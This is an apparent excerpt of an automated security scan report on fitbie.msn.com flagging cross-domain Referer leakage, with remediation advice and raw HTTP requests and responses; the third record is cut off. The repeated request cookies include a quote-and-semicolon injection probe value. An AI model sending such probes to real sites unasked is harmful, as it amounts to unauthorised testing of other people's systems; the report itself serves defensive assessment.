When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/anytime-anywhere-yoga

Issue detail

The page was loaded from a URL containing a query string: http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002

The response contains the following links to other domains:

Request

GET /get-fit/anytime-anywhere-yoga?gt1=50002 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:09 +0000
ETag: "1297607169-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42937
Expires: Mon, 14 Feb 2011 02:26:10 GMT
Date: Sun, 13 Feb 2011 14:30:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 95712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
   <a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99&cent; an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go &gt;</a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
<a href="http://www.facebook.com/sharer.php?u=/get-fit/anytime-anywhere-yoga?gt1=50002" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002&amp;layout=button_count&amp;show_faces=false&amp;action=like&amp;colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
</span>
       <a href="http://www.prevention.com/"> <img src="/sites/all/themes/fitlife/images/brandlogos/prevention.png" alt="prevention" />
...[SNIP]...
<p><a href="http://www.prevention.com/health/fitness/yoga/beginner-yoga-poses/article/6b33d08f88803110VgnVCM20000012281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-Tips%20for%20yoga%20beginners" target="_blank"><strong>
...[SNIP]...
<p><a href="http://www.prevention.com/health/fitness/yoga/10-yoga-poses-for-a-cover-model-body/article/0638a6b509787110VgnVCM20000012281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-10%20Yoga%20poses%20for%20a%20model%20worthy%20body" target="_blank"><strong>
...[SNIP]...
<p><a href="http://www.prevention.com/health/fitness/yoga/omm-away-the-years/article/8f3d9fb29034c110VgnVCM10000013281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-15%20Minute%20yoga%20routine%20to%20fight%20pain%20and%20boost%20energy" target="_blank"><strong>
...[SNIP]...
<p><a href="http://online.prevention.com/topdvds/index.html?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-10%20Reasons%20to%20get%20off%20the%20couch" target="_blank"><strong>
...[SNIP]...
</div>
       <a class="da2a_button" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Fget-fit%2Fanytime-anywhere-yoga&amp;linkname=Anytime%2C%20Anywhere%20Yoga%20%7C%20Fitbie" id="da2a_1"> </a>
...[SNIP]...
<h5>More From
<a href="http://www.prevention.com/health/fitness/no-cat/yoga-poses/article/e583d08f88803110VgnVCM20000012281eac____" alt="Anywhere, Anytime Yoga" target="_new"><img src="/sites/all/themes/fitlife/images/brandlogos/prevention.png" alt="prevention" />
...[SNIP]...
<li class="more-from-link">
<a href="http://www.prevention.com/couchpotatoworkout/?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-The%20Coach-Potato%20Workout%20RL" target="_new" title="The Coach-Potato Workout">The Coach-Potato Workout</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.prevention.com/totalbodytoning/index.shtml?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-6%20Moves%20to%20Tone%20Your%20Entire%20Body%20RL" target="_new" title="6 Moves to Tone Your Entire Body">6 Moves to Tone Your Entire Body</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.prevention.com/7weightlossmistakes/index.shtml?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-7%20Mistakes%20Healthy%20Eaters%20Make%20RL" target="_new" title="7 Mistakes Healthy Eaters Make">7 Mistakes Healthy Eaters Make</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002">Digg</a></li>
<li class="share">
       <a class="da2a_button" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Fget-fit%2Fanytime-anywhere-yoga&amp;linkname=Anytime%2C%20Anywhere%20Yoga%20%7C%20Fitbie" id="da2a_1"> Share</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/fitbie/getfit;kw=;slot=300x250.1;topic=yoga;sbtpc=anytimeanywhereyoga;tile=1;sz=300x250;ord=123456?" target="_blank">
<img src="http://ad.doubleclick.net/ad/fitbie/getfit;topic=yoga;sbtpc=anytimeanywhereyoga;tile=1;sz=300x250;ord=123456?" width="300" height="250" border="0" alt="" />
</a>
...[SNIP]...
<td>&nbsp;&nbsp;&nbsp;<a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<a href="http://fitbie.msn.com/100calories"><img src="http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg" alt="Simple Ways to Cut 100 Calories" border="0"/></a>
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

4.2. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/12-ways-make-water-less-boring

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /slideshow/12-ways-make-water-less-boring?gt1=50005 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:37 +0000
ETag: "1297607197-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42929
Expires: Mon, 14 Feb 2011 02:26:39 GMT
Date: Sun, 13 Feb 2011 14:31:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
   <a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99&cent; an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go &gt;</a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
<a href="http://www.facebook.com/sharer.php?u=/slideshow/12-ways-make-water-less-boring?gt1=50005" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005&amp;layout=button_count&amp;show_faces=false&amp;action=like&amp;colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005">Digg</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/fitbie/eatright;kw=slideshow;slot=300x250.1;topic=healthyeatingbasics;sbtpc=12waystomakewaterlessboring;tile=1;sz=300x250;ord=123456?" target="_blank">
<img src="http://ad.doubleclick.net/ad/fitbie/eatright;topic=healthyeatingbasics;sbtpc=12waystomakewaterlessboring;tile=1;sz=300x250;ord=123456?" width="300" height="250" border="0" alt="" />
</a>
...[SNIP]...
<td>&nbsp;&nbsp;&nbsp;<a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<a href="http://fitbie.msn.com/100calories"><img src="http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg" alt="Simple Ways to Cut 100 Calories" border="0"/></a>
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

4.3. http://fitbie.msn.com/slideshow/why-being-single-better-your-body

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/why-being-single-better-your-body

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /slideshow/why-being-single-better-your-body?ocid=xnetr1-1 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
